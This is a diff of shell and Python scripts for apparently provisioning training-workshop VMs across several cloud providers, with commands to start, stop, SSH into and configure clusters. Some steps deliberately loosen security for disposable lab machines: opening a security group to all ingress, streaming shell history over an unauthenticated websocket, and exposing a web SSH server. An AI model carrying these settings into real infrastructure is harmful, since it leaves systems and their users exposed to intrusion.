sudo mkdir -p /tmp/tailhist
|
||||
sudo tee /root/tailhist.service <<EOF
|
||||
[Unit]
|
||||
Description=tailhist
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/tmp/tailhist
|
||||
ExecStart=/usr/bin/websocketd --port=1088 --staticdir=. sh -c \"tail -n +1 -f /home/docker/.history || echo 'Could not read history file. Perhaps you need to \\\"chmod +r .history\\\"?'\"
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF
|
||||
sudo systemctl enable /root/tailhist.service
|
||||
sudo systemctl start tailhist"
|
||||
pssh -I sudo tee /tmp/tailhist/index.html <lib/tailhist.html
|
||||
}
|
||||
|
||||
_cmd opensg "Open the default security group to ALL ingress traffic"
|
||||
_cmd_opensg() {
|
||||
need_infra $1
|
||||
@@ -338,22 +565,45 @@ _cmd_pull_images() {
|
||||
pull_tag
|
||||
}
|
||||
|
||||
_cmd remap_nodeports "Remap NodePort range to 10000-10999"
|
||||
_cmd_remap_nodeports() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
FIND_LINE=" - --service-cluster-ip-range=10.96.0.0\/12"
|
||||
ADD_LINE=" - --service-node-port-range=10000-10999"
|
||||
MANIFEST_FILE=/etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
pssh "
|
||||
if i_am_first_node && ! grep -q '$ADD_LINE' $MANIFEST_FILE; then
|
||||
sudo sed -i 's/\($FIND_LINE\)\$/\1\n$ADD_LINE/' $MANIFEST_FILE
|
||||
fi"
|
||||
|
||||
info "If you have manifests hard-coding nodePort values,"
|
||||
info "you might want to patch them with a command like:"
|
||||
info "
|
||||
|
||||
if i_am_first_node; then
|
||||
kubectl -n kube-system patch svc prometheus-server \\
|
||||
-p 'spec: { ports: [ {port: 80, nodePort: 10101} ]}'
|
||||
fi
|
||||
|
||||
"
|
||||
}
|
||||
|
||||
_cmd quotas "Check our infrastructure quotas (max instances)"
|
||||
_cmd_quotas() {
|
||||
need_infra $1
|
||||
infra_quotas
|
||||
}
|
||||
|
||||
_cmd retag "(FIXME) Apply a new tag to a group of VMs"
|
||||
_cmd_retag() {
|
||||
OLDTAG=$1
|
||||
NEWTAG=$2
|
||||
TAG=$OLDTAG
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
if [[ -z "$NEWTAG" ]]; then
|
||||
die "You must specify a new tag to apply."
|
||||
fi
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh $SSHOPTS docker@$IP
|
||||
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
@@ -362,12 +612,13 @@ _cmd_start() {
|
||||
case "$1" in
|
||||
--infra) INFRA=$2; shift 2;;
|
||||
--settings) SETTINGS=$2; shift 2;;
|
||||
--count) COUNT=$2; shift 2;;
|
||||
--count) die "Flag --count is deprecated; please use --students instead." ;;
|
||||
--tag) TAG=$2; shift 2;;
|
||||
--students) STUDENTS=$2; shift 2;;
|
||||
*) die "Unrecognized parameter: $1."
|
||||
esac
|
||||
done
|
||||
|
||||
|
||||
if [ -z "$INFRA" ]; then
|
||||
die "Please add --infra flag to specify which infrastructure file to use."
|
||||
fi
|
||||
@@ -375,16 +626,22 @@ _cmd_start() {
|
||||
die "Please add --settings flag to specify which settings file to use."
|
||||
fi
|
||||
if [ -z "$COUNT" ]; then
|
||||
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
|
||||
warning "No --count option was specified. Using value from settings file ($COUNT)."
|
||||
CLUSTERSIZE=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
|
||||
if [ -z "$STUDENTS" ]; then
|
||||
warning "Neither --count nor --students was specified."
|
||||
warning "According to the settings file, the cluster size is $CLUSTERSIZE."
|
||||
warning "Deploying one cluster of $CLUSTERSIZE nodes."
|
||||
STUDENTS=1
|
||||
fi
|
||||
COUNT=$(($STUDENTS*$CLUSTERSIZE))
|
||||
fi
|
||||
|
||||
# Check that the specified settings and infrastructure are valid.
|
||||
|
||||
# Check that the specified settings and infrastructure are valid.
|
||||
need_settings $SETTINGS
|
||||
need_infra $INFRA
|
||||
|
||||
if [ -z "$TAG" ]; then
|
||||
TAG=$(make_tag)
|
||||
TAG=$(_cmd_maketag)
|
||||
fi
|
||||
mkdir -p tags/$TAG
|
||||
ln -s ../../$INFRA tags/$TAG/infra.sh
|
||||
@@ -394,11 +651,43 @@ _cmd_start() {
|
||||
infra_start $COUNT
|
||||
sep
|
||||
info "Successfully created $COUNT instances with tag $TAG"
|
||||
sep
|
||||
echo created > tags/$TAG/status
|
||||
|
||||
info "To deploy Docker on these instances, you can run:"
|
||||
info "$0 deploy $TAG"
|
||||
# If the settings.yaml file has a "steps" field,
|
||||
# automatically execute all the actions listed in that field.
|
||||
# If an action fails, retry it up to 10 times.
|
||||
python -c 'if True: # hack to deal with indentation
|
||||
import sys, yaml
|
||||
settings = yaml.safe_load(sys.stdin)
|
||||
print ("\n".join(settings.get("steps", [])))
|
||||
' < tags/$TAG/settings.yaml \
|
||||
| while read step; do
|
||||
if [ -z "$step" ]; then
|
||||
break
|
||||
fi
|
||||
sep
|
||||
info "Automatically executing step '$step'."
|
||||
TRY=1
|
||||
MAXTRY=10
|
||||
while ! $0 $step $TAG ; do
|
||||
TRY=$(($TRY+1))
|
||||
if [ $TRY -gt $MAXTRY ]; then
|
||||
error "This step ($step) failed after $MAXTRY attempts."
|
||||
info "You can troubleshoot the situation manually, or terminate these instances with:"
|
||||
info "$0 stop $TAG"
|
||||
die "Giving up."
|
||||
else
|
||||
sep
|
||||
info "Step '$step' failed. Let's wait 10 seconds and try again."
|
||||
info "(Attempt $TRY out of $MAXTRY.)"
|
||||
sleep 10
|
||||
fi
|
||||
done
|
||||
done
|
||||
sep
|
||||
info "Deployment successful."
|
||||
info "To log into the first machine of that batch, you can run:"
|
||||
info "$0 ssh $TAG"
|
||||
info "To terminate these instances, you can run:"
|
||||
info "$0 stop $TAG"
|
||||
}
|
||||
@@ -446,21 +735,25 @@ _cmd_test() {
|
||||
test_tag
|
||||
}
|
||||
|
||||
_cmd helmprom "Install Helm and Prometheus"
|
||||
_cmd tmux "Log into the first node and start a tmux server"
|
||||
_cmd_tmux() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Opening ssh+tmux with $IP"
|
||||
rm -f /tmp/tmux-$UID/default
|
||||
ssh $SSHOPTS -t -L /tmp/tmux-$UID/default:/tmp/tmux-1001/default docker@$IP tmux new-session -As 0
|
||||
}
|
||||
|
||||
_cmd helmprom "Install Prometheus with Helm"
|
||||
_cmd_helmprom() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
kubectl -n kube-system get serviceaccount helm ||
|
||||
kubectl -n kube-system create serviceaccount helm
|
||||
helm init --service-account helm
|
||||
kubectl get clusterrolebinding helm-can-do-everything ||
|
||||
kubectl create clusterrolebinding helm-can-do-everything \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=kube-system:helm
|
||||
helm upgrade --install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
if i_am_first_node; then
|
||||
sudo -u docker -H helm upgrade --install prometheus prometheus \
|
||||
--repo https://prometheus-community.github.io/helm-charts/ \
|
||||
--namespace prometheus --create-namespace \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
--set server.persistentVolume.enabled=false \
|
||||
@@ -468,6 +761,31 @@ _cmd_helmprom() {
|
||||
fi"
|
||||
}
|
||||
|
||||
_cmd passwords "Set individual passwords for each cluster"
|
||||
_cmd_passwords() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
PASSWORDS_FILE="tags/$TAG/passwords"
|
||||
if ! [ -f "$PASSWORDS_FILE" ]; then
|
||||
error "File $PASSWORDS_FILE not found. Please create it first."
|
||||
error "It should contain one password per line."
|
||||
error "It should have as many lines as there are clusters."
|
||||
die "Aborting."
|
||||
fi
|
||||
N_CLUSTERS=$($0 ips "$TAG" | wc -l)
|
||||
N_PASSWORDS=$(wc -l < "$PASSWORDS_FILE")
|
||||
if [ "$N_CLUSTERS" != "$N_PASSWORDS" ]; then
|
||||
die "Found $N_CLUSTERS clusters and $N_PASSWORDS passwords. Aborting."
|
||||
fi
|
||||
$0 ips "$TAG" | paste "$PASSWORDS_FILE" - | while read password nodes; do
|
||||
info "Setting password for $nodes..."
|
||||
for node in $nodes; do
|
||||
echo docker:$password | ssh $SSHOPTS ubuntu@$node sudo chpasswd
|
||||
done
|
||||
done
|
||||
info "Done."
|
||||
}
|
||||
|
||||
# Sometimes, weave fails to come up on some nodes.
|
||||
# Symptom: the pods on a node are unreachable (they don't even ping).
|
||||
# Remedy: wipe out Weave state and delete weave pod on that node.
|
||||
@@ -484,9 +802,49 @@ _cmd_weavetest() {
|
||||
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
|
||||
}
|
||||
|
||||
greet() {
|
||||
IAMUSER=$(aws iam get-user --query 'User.UserName')
|
||||
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
|
||||
_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
|
||||
_cmd_webssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install python-tornado python-paramiko -y"
|
||||
pssh "
|
||||
cd /opt
|
||||
[ -d webssh ] || sudo git clone https://github.com/jpetazzo/webssh"
|
||||
pssh "
|
||||
for KEYFILE in /etc/ssh/*.pub; do
|
||||
read a b c < \$KEYFILE; echo localhost \$a \$b
|
||||
done | sudo tee /opt/webssh/known_hosts"
|
||||
pssh "cat >webssh.service <<EOF
|
||||
[Unit]
|
||||
Description=webssh
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/opt/webssh
|
||||
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF"
|
||||
pssh "
|
||||
sudo systemctl enable \$PWD/webssh.service &&
|
||||
sudo systemctl start webssh.service"
|
||||
}
|
||||
|
||||
_cmd www "Run a web server to access card HTML and PDF"
|
||||
_cmd_www() {
|
||||
cd www
|
||||
IPADDR=$(curl -sL canihazip.com/s)
|
||||
info "The following files are available:"
|
||||
for F in *; do
|
||||
echo "http://$IPADDR:8000/$F"
|
||||
done
|
||||
info "Press Ctrl-C to stop server."
|
||||
python3 -m http.server
|
||||
}
|
||||
|
||||
pull_tag() {
|
||||
@@ -541,8 +899,8 @@ test_vm() {
|
||||
for cmd in "hostname" \
|
||||
"whoami" \
|
||||
"hostname -i" \
|
||||
"cat /tmp/node" \
|
||||
"cat /tmp/ipv4" \
|
||||
"ls -l /usr/local/bin/i_am_first_node" \
|
||||
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
|
||||
"cat /etc/hosts" \
|
||||
"hostnamectl status" \
|
||||
"docker version | grep Version -B1" \
|
||||
@@ -556,10 +914,7 @@ test_vm() {
|
||||
"ls -la /home/docker/.ssh"; do
|
||||
sep "$cmd"
|
||||
echo "$cmd" \
|
||||
| ssh -A -q \
|
||||
-o "UserKnownHostsFile /dev/null" \
|
||||
-o "StrictHostKeyChecking=no" \
|
||||
$user@$ip sudo -u docker -i \
|
||||
| ssh -A $SSHOPTS $user@$ip sudo -u docker -i \
|
||||
|| {
|
||||
status=$?
|
||||
error "$cmd exit status: $status"
|
||||
@@ -578,34 +933,3 @@ make_key_name() {
|
||||
SHORT_FINGERPRINT=$(ssh-add -l | grep RSA | head -n1 | cut -d " " -f 2 | tr -d : | cut -c 1-8)
|
||||
echo "${SHORT_FINGERPRINT}-${USER}"
|
||||
}
|
||||
|
||||
sync_keys() {
|
||||
# make sure ssh-add -l contains "RSA"
|
||||
ssh-add -l | grep -q RSA \
|
||||
|| die "The output of \`ssh-add -l\` doesn't contain 'RSA'. Start the agent, add your keys?"
|
||||
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
info "Syncing keys... "
|
||||
if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
|
||||
aws ec2 import-key-pair --key-name $AWS_KEY_NAME \
|
||||
--public-key-material "$(ssh-add -L \
|
||||
| grep -i RSA \
|
||||
| head -n1 \
|
||||
| cut -d " " -f 1-2)" &>/dev/null
|
||||
|
||||
if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
|
||||
die "Somehow, importing the key didn't work. Make sure that 'ssh-add -l | grep RSA | head -n1' returns an RSA key?"
|
||||
else
|
||||
info "Imported new key $AWS_KEY_NAME."
|
||||
fi
|
||||
else
|
||||
info "Using existing key $AWS_KEY_NAME."
|
||||
fi
|
||||
}
|
||||
|
||||
make_tag() {
|
||||
if [ -z $USER ]; then
|
||||
export USER=anonymous
|
||||
fi
|
||||
date +%Y-%m-%d-%H-%M-$USER
|
||||
}
|
||||
|
||||
@@ -1,9 +1,14 @@
|
||||
if ! command -v aws >/dev/null; then
|
||||
warning "AWS CLI (aws) not found."
|
||||
fi
|
||||
|
||||
infra_list() {
|
||||
aws_display_tags
|
||||
aws ec2 describe-instances --output json |
|
||||
jq -r '.Reservations[].Instances[] | [.InstanceId, .ClientToken, .State.Name, .InstanceType ] | @tsv'
|
||||
}
|
||||
|
||||
infra_quotas() {
|
||||
greet
|
||||
aws_greet
|
||||
|
||||
max_instances=$(aws ec2 describe-account-attributes \
|
||||
--attribute-names max-instances \
|
||||
@@ -21,16 +26,17 @@ infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
# Print our AWS username, to ease the pain of credential-juggling
|
||||
greet
|
||||
aws_greet
|
||||
|
||||
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
|
||||
key_name=$(sync_keys)
|
||||
key_name=$(aws_sync_keys)
|
||||
|
||||
AMI=$(aws_get_ami) # Retrieve the AWS image ID
|
||||
if [ -z "$AMI" ]; then
|
||||
die "I could not find which AMI to use in this region. Try another region?"
|
||||
fi
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
|
||||
|
||||
sep "Starting instances"
|
||||
info " Count: $COUNT"
|
||||
@@ -38,10 +44,11 @@ infra_start() {
|
||||
info " Token/tag: $TAG"
|
||||
info " AMI: $AMI"
|
||||
info " Key name: $AWS_KEY_NAME"
|
||||
info " Instance type: $AWS_INSTANCE_TYPE"
|
||||
result=$(aws ec2 run-instances \
|
||||
--key-name $AWS_KEY_NAME \
|
||||
--count $COUNT \
|
||||
--instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
|
||||
--instance-type $AWS_INSTANCE_TYPE \
|
||||
--client-token $TAG \
|
||||
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
|
||||
--image-id $AMI)
|
||||
@@ -59,7 +66,7 @@ infra_start() {
|
||||
aws_tag_instances $TAG $TAG
|
||||
|
||||
# Wait until EC2 API tells us that the instances are running
|
||||
wait_until_tag_is_running $TAG $COUNT
|
||||
aws_wait_until_tag_is_running $TAG $COUNT
|
||||
|
||||
aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
|
||||
}
|
||||
@@ -96,8 +103,8 @@ infra_disableaddrchecks() {
|
||||
done
|
||||
}
|
||||
|
||||
wait_until_tag_is_running() {
|
||||
max_retry=50
|
||||
aws_wait_until_tag_is_running() {
|
||||
max_retry=100
|
||||
i=0
|
||||
done_count=0
|
||||
while [[ $done_count -lt $COUNT ]]; do
|
||||
@@ -210,5 +217,34 @@ aws_tag_instances() {
|
||||
|
||||
aws_get_ami() {
|
||||
##VERSION##
|
||||
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
|
||||
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a ${AWS_ARCHITECTURE-amd64} -v 18.04 -t hvm:ebs -N -q
|
||||
}
|
||||
|
||||
aws_greet() {
|
||||
IAMUSER=$(aws iam get-user --query 'User.UserName')
|
||||
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
|
||||
}
|
||||
|
||||
aws_sync_keys() {
|
||||
# make sure ssh-add -l contains "RSA"
|
||||
ssh-add -l | grep -q RSA \
|
||||
|| die "The output of \`ssh-add -l\` doesn't contain 'RSA'. Start the agent, add your keys?"
|
||||
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
info "Syncing keys... "
|
||||
if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
|
||||
aws ec2 import-key-pair --key-name $AWS_KEY_NAME \
|
||||
--public-key-material "$(ssh-add -L \
|
||||
| grep -i RSA \
|
||||
| head -n1 \
|
||||
| cut -d " " -f 1-2)" &>/dev/null
|
||||
|
||||
if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
|
||||
die "Somehow, importing the key didn't work. Make sure that 'ssh-add -l | grep RSA | head -n1' returns an RSA key?"
|
||||
else
|
||||
info "Imported new key $AWS_KEY_NAME."
|
||||
fi
|
||||
else
|
||||
info "Using existing key $AWS_KEY_NAME."
|
||||
fi
|
||||
}
|
||||
|
||||
57
prepare-vms/lib/infra/hetzner.sh
Normal file
57
prepare-vms/lib/infra/hetzner.sh
Normal file
@@ -0,0 +1,57 @@
|
||||
if ! command -v hcloud >/dev/null; then
|
||||
warning "Hetzner CLI (hcloud) not found."
|
||||
fi
|
||||
if ! [ -f ~/.config/hcloud/cli.toml ]; then
|
||||
warning "~/.config/hcloud/cli.toml not found."
|
||||
fi
|
||||
|
||||
infra_list() {
|
||||
[ "$(hcloud server list -o json)" = "null" ] && return
|
||||
|
||||
hcloud server list -o json |
|
||||
jq -r '.[] | [.id, .name , .status, .server_type.name] | @tsv'
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
HETZNER_INSTANCE_TYPE=${HETZNER_INSTANCE_TYPE-cx21}
|
||||
HETZNER_DATACENTER=${HETZNER_DATACENTER-nbg1-dc3}
|
||||
HETZNER_IMAGE=${HETZNER_IMAGE-168855}
|
||||
|
||||
for I in $(seq 1 $COUNT); do
|
||||
NAME=$(printf "%s-%03d" $TAG $I)
|
||||
sep "Starting instance $I/$COUNT"
|
||||
info " Datacenter: $HETZNER_DATACENTER"
|
||||
info " Name: $NAME"
|
||||
info " Instance type: $HETZNER_INSTANCE_TYPE"
|
||||
hcloud server create \
|
||||
--type=${HETZNER_INSTANCE_TYPE} \
|
||||
--datacenter=${HETZNER_DATACENTER} \
|
||||
--image=${HETZNER_IMAGE} \
|
||||
--name=$NAME \
|
||||
--label=tag=$TAG \
|
||||
--ssh-key ~/.ssh/id_rsa.pub
|
||||
done
|
||||
|
||||
hetzner_get_ips_by_tag $TAG > tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
for ID in $(hetzner_get_ids_by_tag $TAG); do
|
||||
info "Scheduling deletion of instance $ID..."
|
||||
hcloud server delete $ID &
|
||||
done
|
||||
info "Waiting for deletion to complete..."
|
||||
wait
|
||||
}
|
||||
|
||||
hetzner_get_ids_by_tag() {
|
||||
TAG=$1
|
||||
hcloud server list --selector=tag=$TAG -o json | jq -r .[].name
|
||||
}
|
||||
|
||||
hetzner_get_ips_by_tag() {
|
||||
TAG=$1
|
||||
hcloud server list --selector=tag=$TAG -o json | jq -r .[].public_net.ipv4.ip
|
||||
}
|
||||
58
prepare-vms/lib/infra/linode.sh
Normal file
58
prepare-vms/lib/infra/linode.sh
Normal file
@@ -0,0 +1,58 @@
|
||||
if ! command -v linode-cli >/dev/null; then
|
||||
warning "Linode CLI (linode-cli) not found."
|
||||
fi
|
||||
if ! [ -f ~/.config/linode-cli ]; then
|
||||
warning "~/.config/linode-cli not found."
|
||||
fi
|
||||
|
||||
# To view available regions: "linode-cli regions list"
|
||||
LINODE_REGION=${LINODE_REGION-us-west}
|
||||
|
||||
# To view available types: "linode-cli linodes types"
|
||||
LINODE_TYPE=${LINODE_TYPE-g6-standard-2}
|
||||
|
||||
infra_list() {
|
||||
linode-cli linodes list --json |
|
||||
jq -r '.[] | [.id, .label, .status, .type] | @tsv'
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
for I in $(seq 1 $COUNT); do
|
||||
NAME=$(printf "%s-%03d" $TAG $I)
|
||||
sep "Starting instance $I/$COUNT"
|
||||
info " Zone: $LINODE_REGION"
|
||||
info " Name: $NAME"
|
||||
info " Instance type: $LINODE_TYPE"
|
||||
ROOT_PASS="$(base64 /dev/urandom | cut -c1-20 | head -n 1)"
|
||||
linode-cli linodes create \
|
||||
--type=${LINODE_TYPE} --region=${LINODE_REGION} \
|
||||
--image=linode/ubuntu18.04 \
|
||||
--authorized_keys="${LINODE_SSHKEY}" \
|
||||
--root_pass="${ROOT_PASS}" \
|
||||
--tags=${TAG} --label=${NAME}
|
||||
done
|
||||
sep
|
||||
|
||||
linode_get_ips_by_tag $TAG > tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
info "Counting instances..."
|
||||
linode_get_ids_by_tag $TAG | wc -l
|
||||
info "Deleting instances..."
|
||||
linode_get_ids_by_tag $TAG |
|
||||
xargs -n1 -P10 \
|
||||
linode-cli linodes delete
|
||||
}
|
||||
|
||||
linode_get_ids_by_tag() {
|
||||
TAG=$1
|
||||
linode-cli linodes list --tags $TAG --json | jq -r ".[].id"
|
||||
}
|
||||
|
||||
linode_get_ips_by_tag() {
|
||||
TAG=$1
|
||||
linode-cli linodes list --tags $TAG --json | jq -r ".[].ipv4[0]"
|
||||
}
|
||||
53
prepare-vms/lib/infra/openstack-cli.sh
Normal file
53
prepare-vms/lib/infra/openstack-cli.sh
Normal file
@@ -0,0 +1,53 @@
|
||||
infra_list() {
|
||||
openstack server list -f json |
|
||||
jq -r '.[] | [.ID, .Name , .Status, .Flavor] | @tsv'
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
sep "Starting $COUNT instances"
|
||||
info " Region: $OS_REGION_NAME"
|
||||
info " User: $OS_USERNAME"
|
||||
info " Flavor: $OS_FLAVOR"
|
||||
info " Image: $OS_IMAGE"
|
||||
openstack server create \
|
||||
--flavor $OS_FLAVOR \
|
||||
--image $OS_IMAGE \
|
||||
--key-name $OS_KEY \
|
||||
--min $COUNT --max $COUNT \
|
||||
--property workshopctl=$TAG \
|
||||
$TAG
|
||||
|
||||
sep "Waiting for IP addresses to be available"
|
||||
GOT=0
|
||||
while [ "$GOT" != "$COUNT" ]; do
|
||||
echo "Got $GOT/$COUNT IP addresses."
|
||||
oscli_get_ips_by_tag $TAG > tags/$TAG/ips.txt
|
||||
GOT="$(wc -l < tags/$TAG/ips.txt)"
|
||||
done
|
||||
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
info "Counting instances..."
|
||||
oscli_get_instances_json $TAG |
|
||||
jq -r .[].Name |
|
||||
wc -l
|
||||
info "Deleting instances..."
|
||||
oscli_get_instances_json $TAG |
|
||||
jq -r .[].Name |
|
||||
xargs -P10 -n1 openstack server delete
|
||||
info "Done."
|
||||
}
|
||||
|
||||
oscli_get_instances_json() {
|
||||
TAG=$1
|
||||
openstack server list -f json --name "${TAG}-[0-9]*"
|
||||
}
|
||||
|
||||
oscli_get_ips_by_tag() {
|
||||
TAG=$1
|
||||
oscli_get_instances_json $TAG |
|
||||
jq -r .[].Networks | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' || true
|
||||
}
|
||||
28
prepare-vms/lib/infra/openstack-tf.sh
Normal file
28
prepare-vms/lib/infra/openstack-tf.sh
Normal file
@@ -0,0 +1,28 @@
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
cp terraform/*.tf tags/$TAG
|
||||
(
|
||||
cd tags/$TAG
|
||||
if ! terraform init; then
|
||||
error "'terraform init' failed."
|
||||
error "If it mentions the following error message:"
|
||||
error "openpgp: signature made by unknown entity."
|
||||
error "Then you need to upgrade Terraform to 0.11.15"
|
||||
error "to upgrade its signing keys following the"
|
||||
error "codecov breach."
|
||||
die "Aborting."
|
||||
fi
|
||||
echo prefix = \"$TAG\" >> terraform.tfvars
|
||||
echo count = \"$COUNT\" >> terraform.tfvars
|
||||
terraform apply -auto-approve
|
||||
terraform output ip_addresses > ips.txt
|
||||
)
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
(
|
||||
cd tags/$TAG
|
||||
terraform destroy -auto-approve
|
||||
)
|
||||
}
|
||||
@@ -1,20 +0,0 @@
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
cp terraform/*.tf tags/$TAG
|
||||
(
|
||||
cd tags/$TAG
|
||||
terraform init
|
||||
echo prefix = \"$TAG\" >> terraform.tfvars
|
||||
echo count = \"$COUNT\" >> terraform.tfvars
|
||||
terraform apply -auto-approve
|
||||
terraform output ip_addresses > ips.txt
|
||||
)
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
(
|
||||
cd tags/$TAG
|
||||
terraform destroy -auto-approve
|
||||
)
|
||||
}
|
||||
51
prepare-vms/lib/infra/scaleway.sh
Normal file
51
prepare-vms/lib/infra/scaleway.sh
Normal file
@@ -0,0 +1,51 @@
|
||||
if ! command -v scw >/dev/null; then
|
||||
warning "Scaleway CLI (scw) not found."
|
||||
fi
|
||||
if ! [ -f ~/.config/scw/config.yaml ]; then
|
||||
warning "~/.config/scw/config.yaml not found."
|
||||
fi
|
||||
|
||||
SCW_INSTANCE_TYPE=${SCW_INSTANCE_TYPE-DEV1-M}
|
||||
SCW_ZONE=${SCW_ZONE-fr-par-1}
|
||||
|
||||
infra_list() {
|
||||
scw instance server list -o json |
|
||||
jq -r '.[] | [.id, .name, .state, .commercial_type] | @tsv'
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
for I in $(seq 1 $COUNT); do
|
||||
NAME=$(printf "%s-%03d" $TAG $I)
|
||||
sep "Starting instance $I/$COUNT"
|
||||
info " Zone: $SCW_ZONE"
|
||||
info " Name: $NAME"
|
||||
info " Instance type: $SCW_INSTANCE_TYPE"
|
||||
scw instance server create \
|
||||
type=${SCW_INSTANCE_TYPE} zone=${SCW_ZONE} \
|
||||
image=ubuntu_bionic name=${NAME}
|
||||
done
|
||||
sep
|
||||
|
||||
scw_get_ips_by_tag $TAG > tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
info "Counting instances..."
|
||||
scw_get_ids_by_tag $TAG | wc -l
|
||||
info "Deleting instances..."
|
||||
scw_get_ids_by_tag $TAG |
|
||||
xargs -n1 -P10 \
|
||||
scw instance server delete zone=${SCW_ZONE} force-shutdown=true with-ip=true
|
||||
}
|
||||
|
||||
scw_get_ids_by_tag() {
|
||||
TAG=$1
|
||||
scw instance server list zone=${SCW_ZONE} name=$TAG -o json | jq -r .[].id
|
||||
}
|
||||
|
||||
scw_get_ips_by_tag() {
|
||||
TAG=$1
|
||||
scw instance server list zone=${SCW_ZONE} name=$TAG -o json | jq -r .[].public_ip.address
|
||||
}
|
||||
23
prepare-vms/lib/infra/unimplemented.sh
Normal file
23
prepare-vms/lib/infra/unimplemented.sh
Normal file
@@ -0,0 +1,23 @@
|
||||
infra_disableaddrchecks() {
|
||||
die "unimplemented"
|
||||
}
|
||||
|
||||
infra_list() {
|
||||
die "unimplemented"
|
||||
}
|
||||
|
||||
infra_opensg() {
|
||||
die "unimplemented"
|
||||
}
|
||||
|
||||
infra_quotas() {
|
||||
die "unimplemented"
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
die "unimplemented"
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
die "unimplemented"
|
||||
}
|
||||
@@ -1,20 +1,15 @@
|
||||
#!/usr/bin/env python
|
||||
#!/usr/bin/env python3
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
import jinja2
|
||||
|
||||
def prettify(l):
|
||||
l = [ip.strip() for ip in l]
|
||||
ret = [ "node{}: <code>{}</code>".format(i+1, s) for (i, s) in zip(range(len(l)), l) ]
|
||||
return ret
|
||||
|
||||
# Read settings from user-provided settings file
|
||||
SETTINGS = yaml.load(open(sys.argv[1]))
|
||||
|
||||
clustersize = SETTINGS["clustersize"]
|
||||
context = yaml.safe_load(open(sys.argv[1]))
|
||||
|
||||
ips = list(open("ips.txt"))
|
||||
clustersize = context["clustersize"]
|
||||
|
||||
print("---------------------------------------------")
|
||||
print(" Number of IPs: {}".format(len(ips)))
|
||||
@@ -30,7 +25,9 @@ while ips:
|
||||
ips = ips[clustersize:]
|
||||
clusters.append(cluster)
|
||||
|
||||
template_file_name = SETTINGS["cards_template"]
|
||||
context["clusters"] = clusters
|
||||
|
||||
template_file_name = context["cards_template"]
|
||||
template_file_path = os.path.join(
|
||||
os.path.dirname(__file__),
|
||||
"..",
|
||||
@@ -39,18 +36,21 @@ template_file_path = os.path.join(
|
||||
)
|
||||
template = jinja2.Template(open(template_file_path).read())
|
||||
with open("ips.html", "w") as f:
|
||||
f.write(template.render(clusters=clusters, **SETTINGS))
|
||||
f.write(template.render(**context))
|
||||
print("Generated ips.html")
|
||||
|
||||
|
||||
try:
|
||||
import pdfkit
|
||||
